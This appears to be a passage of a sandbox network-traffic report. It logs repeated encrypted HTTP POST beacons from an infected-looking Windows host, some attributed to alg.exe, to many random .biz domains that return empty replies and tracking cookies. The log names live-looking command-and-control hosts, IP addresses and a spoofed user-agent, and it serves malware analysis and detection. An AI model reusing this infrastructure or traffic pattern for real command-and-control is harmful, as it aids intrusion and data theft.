                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:50.605565071 CET | 778 | OUT | Data Raw: 43 19 47 1c 31 22 f0 12 fe 02 00 00 66 f9 7b 44 38 a5 5b d4 f5 c9 70 60 87 ea c3 89 f6 b3 1d bf 17 4e 90 9d 9c cb 16 63 00 5f 48 99 f9 0e a1 e2 a5 c7 c6 35 1e 48 91 c2 4d 90 98 ce fc a9 55 ac 16 1f a4 0c fa 62 b2 e0 78 4b a8 76 91 fc 17 70 c1 fd
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: CG1"f{D8[p`Nc_H5HMUbxKvp)2Sxm3lBqIc%V+iGfeJ^"XCvT#J^Y!$l4;q`SV.9Q*'ZTSz}q2C9-]@A
Nov 18, 2024 09:58:51.274024010 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=03ec2935e19c8497db00707f1465b6d0|155.94.241.187|1731920331|1731920331|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
133 | 192.168.2.7 | 50112 | 18.141.10.107 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:51.211550951 CET | 359 | OUT | POST /ikjsulgnyvsnqbkp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:51.211550951 CET | 842 | OUT | Data Raw: 6f 78 ef 88 b0 94 45 c6 3e 03 00 00 b6 c3 c1 24 b4 32 f2 8e 86 ce ac a7 6f 64 8e 40 81 33 1a f8 e5 06 a2 05 45 dc ca b1 6d f8 b8 3b 34 5e bf ee 10 24 b5 42 18 96 12 92 34 34 e6 63 26 f0 9d a1 3f c6 d2 a0 1a f1 8e ce 23 ed b6 02 2a 41 69 1f 8a 73
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: oxE>$2od@3Em;4^$B44c&?#*Aisbh!\1q)v8)mvXhkL,$WR4j.TJcZw<OX*3Z4lwrFQRe&W5vNezmPlehixGFBB]cmR(0
Nov 18, 2024 09:58:52.679512978 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=e714b32eca058df5e9c44a4f328b8e0a|155.94.241.187|1731920332|1731920332|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
134 | 192.168.2.7 | 50113 | 34.211.97.45 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:51.642838955 CET | 343 | OUT | POST /w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:51.642905951 CET | 778 | OUT | Data Raw: e9 ce 4f 2d a0 93 81 54 fe 02 00 00 ce 7c bf cd b4 33 58 8e 22 e6 91 44 ad 17 49 43 80 7a 52 9a 7a 4d 14 c7 1a f6 61 a8 7f d9 9a 0a 0d bc 84 fb a3 89 59 0a f9 d4 b4 89 7f f6 62 e8 4d 5f d2 17 35 5c 4a 7a 75 e4 8e b1 3f 2d 70 a5 fa be fd f1 71 e1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: O-T|3X"DICzRzMaYbM_5\Jzu?-pq\P3W[^8nWUF0#ioZ?*2`!.m:lkN96(f|zU^[cpiEv_n3Wu-DA>|w,aKkn
Nov 18, 2024 09:58:52.468306065 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=3bf5171ec334b266a07a14301027662d|155.94.241.187|1731920332|1731920332|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
135 | 192.168.2.7 | 50114 | 13.251.16.150 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:52.699666023 CET | 343 | OUT | POST /aa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:52.699686050 CET | 842 | OUT | Data Raw: 92 69 d0 82 a5 c2 4a c6 3e 03 00 00 c7 3e 78 d7 c8 9f 55 65 de 0b 18 03 6c 0a 1b 42 0d 40 cc 63 7f eb 0c 29 30 6d 46 6f 52 e6 b9 63 f2 5d 2a 17 c5 3f df 4c c8 cf 9e 5b 09 99 fb ba f4 f2 34 8b cd 39 f0 8e 0e 87 be d4 cf 46 5b d7 db 9a 5b f8 d4 22
Nov 18, 2024 09:58:54.151648998 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=e68b4434825533a6989d00bfd27d9ffd|155.94.241.187|1731920333|1731920333|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.7 | 50115 | 18.208.156.248 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:52.837021112 CET | 349 | OUT | POST /kxlr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:52.837044001 CET | 778 | OUT | Data Raw: 59 8c d0 dd d8 72 32 bb fe 02 00 00 26 16 fa 0f e2 51 12 0c 86 da 32 7f 3c ed b8 98 94 61 9e 44 48 a8 6f 43 2a cd ec 94 c6 6a 75 bb 2c 1d eb 68 81 6d b7 94 59 e6 1a a6 7b 72 98 a0 d4 38 08 f2 19 f2 f8 80 32 a2 56 20 02 6c e2 a4 7e 44 2d 62 dd 97
Nov 18, 2024 09:58:53.511061907 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=a723f079f695f7bbc92f67e09ff0d546|155.94.241.187|1731920333|1731920333|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.7 | 50116 | 3.254.94.185 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:54.053294897 CET | 354 | OUT | POST /dxdpaygfruq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:54.053333998 CET | 778 | OUT | Data Raw: 62 a1 11 6d c1 3d 4f b4 fe 02 00 00 a5 b6 3c 1b 73 e7 74 47 c5 28 54 25 80 f8 cd 98 9e 8e 07 39 60 96 a8 7b b4 d7 2c 0d 1b d9 25 56 35 ed ed e2 85 3e 92 93 13 f2 9d 2b 33 e3 0b 24 e9 f8 8c 9e 05 9b d6 dc fc 42 8f 5a ba 1e 67 fa 70 58 66 6f 4e 48
Nov 18, 2024 09:58:55.019613981 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
Date: Mon, 18 Nov 2024 08:58:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=95cd7d7db89d2875ef64d50db40e4427|155.94.241.187|1731920334|1731920334|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
138 | 192.168.2.7 | 50117 | 18.208.156.248 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:54.169595957 CET | 361 | OUT | POST /tswjxcwwmwucbcyw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:54.169617891 CET | 842 | OUT | Data Raw: 4f ca 74 92 93 71 68 3f 3e 03 00 00 ee 0c 83 37 54 6c 10 7c 60 47 96 58 58 4b d1 49 78 7c 73 31 13 12 fb 2a 6e fe c4 65 d0 88 db 3e 51 5a bd cc e3 49 65 77 df f4 89 2c 33 6f 38 ad 43 6c e0 da f5 14 7e 67 19 20 80 82 fc 75 63 eb b8 a7 54 48 e1 33
Data Ascii: Otqh?>7Tl|`GXXKIx|s1*ne>QZIew,3o8Cl~g ucTH3hA0B2lk_xWl3-E+?{_+=}t_Q4U^.eMEuR#bpu=XRL#>Km.8f:iANz|cJ9X2(TiW
Nov 18, 2024 09:58:54.832071066 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=23b355411bf0c5b73d52f9331088da4e|155.94.241.187|1731920334|1731920334|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
139 | 192.168.2.7 | 50118 | 18.246.231.120 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:54.851847887 CET | 343 | OUT | POST /ne HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:54.851871014 CET | 842 | OUT | Data Raw: e1 5b e8 c5 55 1b 98 26 3e 03 00 00 2d 8a d6 94 27 18 43 e3 95 26 c7 80 75 69 13 93 58 0c 7f 5b c9 c0 c1 7c d0 90 7d 9a 89 55 b9 a3 77 e2 33 7b 4e 91 72 96 6d 1a 97 67 f3 30 d0 77 df b4 ae 0c 6a 43 8e 18 18 4d af 08 b7 08 63 91 98 6d af d5 10 49
Data Ascii: [U&>-'C&uiX[|}Uw3{Nrmg0wjCMcmIznmutU{<n^)3"V{a)-W;1rH-S/MG<%_F$cm|cHE19|~Yd=~5QAU[]{hj=g
Nov 18, 2024 09:58:55.684005976 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fb28874f9e50e9f413f1c54e4465ef4a|155.94.241.187|1731920335|1731920335|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140 | 192.168.2.7 | 50119 | 54.244.188.177 | 80 | 5368 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:55.451864004 CET | 346 | OUT | POST /qmctu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ywffr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:55.451864004 CET | 778 | OUT | Data Raw: 9d 4b cf 87 c4 4e 9a ea fe 02 00 00 5e e5 b4 93 f0 dd cf d7 7b 64 bf ee 11 cb 3c 55 fe 66 1a a1 51 28 4e 1d cb 8f 09 d8 7e cd 17 61 52 93 da ac 73 b3 2f 08 5c 6c 21 b9 0c 2e 5b 7d 77 2c cc 78 89 37 e4 db f7 be 6d b2 c8 26 9b e6 11 e1 6f d1 af 74
Data Ascii: KN^{d<UfQ(N~aRs/\l!.[}w,x7m&ot0C`n[`QZ!|rB.~/Q\=ag JS:gZ^mX;+hr2T9!vrqV,u]U!-npV9hN!pR
Nov 18, 2024 09:58:56.293092012 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=99cc97a2b88e7121122fd148d1ca2139|155.94.241.187|1731920336|1731920336|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
141 | 192.168.2.7 | 50120 | 44.221.84.105 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:55.701067924 CET | 352 | OUT | POST /sdgvcmfo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:55.701088905 CET | 842 | OUT | Data Raw: d7 4c 93 78 90 20 53 c5 3e 03 00 00 18 c8 fb 16 eb bb 15 0c 97 16 6e 36 d3 35 8f 18 c4 8d 50 0f 5a 98 7e c4 fc 6d 1b 9f 0c 69 0b 5a 73 c1 bb 51 16 f8 a4 82 92 02 67 5b 47 bf df d6 e7 af c5 af 08 23 df de 10 9a 7b 85 68 12 1b 42 91 52 29 43 5b c2
Nov 18, 2024 09:58:56.374641895 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=5d1cb0185f2a22d6bdad1740f014f68e|155.94.241.187|1731920336|1731920336|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
142 | 192.168.2.7 | 50121 | 54.244.188.177 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:56.393744946 CET | 356 | OUT | POST /wkalxigrfxgkug HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:56.393779039 CET | 842 | OUT | Data Raw: 9d a4 89 9f fc 36 09 b8 3e 03 00 00 d8 f0 04 67 ea 82 7a 5f be 0c 95 a8 c7 14 6c 00 c3 10 6c 99 91 a0 37 7d 63 00 67 ce 18 9f 68 4a d6 2b 92 99 60 c9 a4 57 6d 0a 14 e3 a7 fb 45 12 43 e0 22 8d a6 45 9c 81 0e 9a 73 e2 03 83 f3 55 01 90 37 9a 07 1f
Nov 18, 2024 09:58:57.233956099 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=7ca220507c288f95b339ab8ad15ad990|155.94.241.187|1731920337|1731920337|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
143 | 192.168.2.7 | 50122 | 54.244.188.177 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:56.928046942 CET | 350 | OUT | POST /brgveksk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:56.928071976 CET | 778 | OUT | Data Raw: a2 17 08 76 d8 60 b1 2d fe 02 00 00 dc f4 e0 93 e1 30 52 46 b7 31 58 5f b0 f7 ae c7 66 da cf 8c bb 02 72 18 c8 06 f2 45 a7 6a ca 8a 5e 3e f1 61 53 f5 9e 5c a4 b2 a1 69 aa 3c 45 60 de 73 35 20 cd 3b 36 16 ae f9 28 69 a3 96 79 87 4f 68 96 71 2d bf
Nov 18, 2024 09:58:57.757605076 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=265bf9fc9fc6ed3ab0ba1256d6d8b5b9|155.94.241.187|1731920337|1731920337|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
144         192.168.2.7  50123        3.254.94.185    80
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:58:57.257750988 CET  344                OUT        POST /cje HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
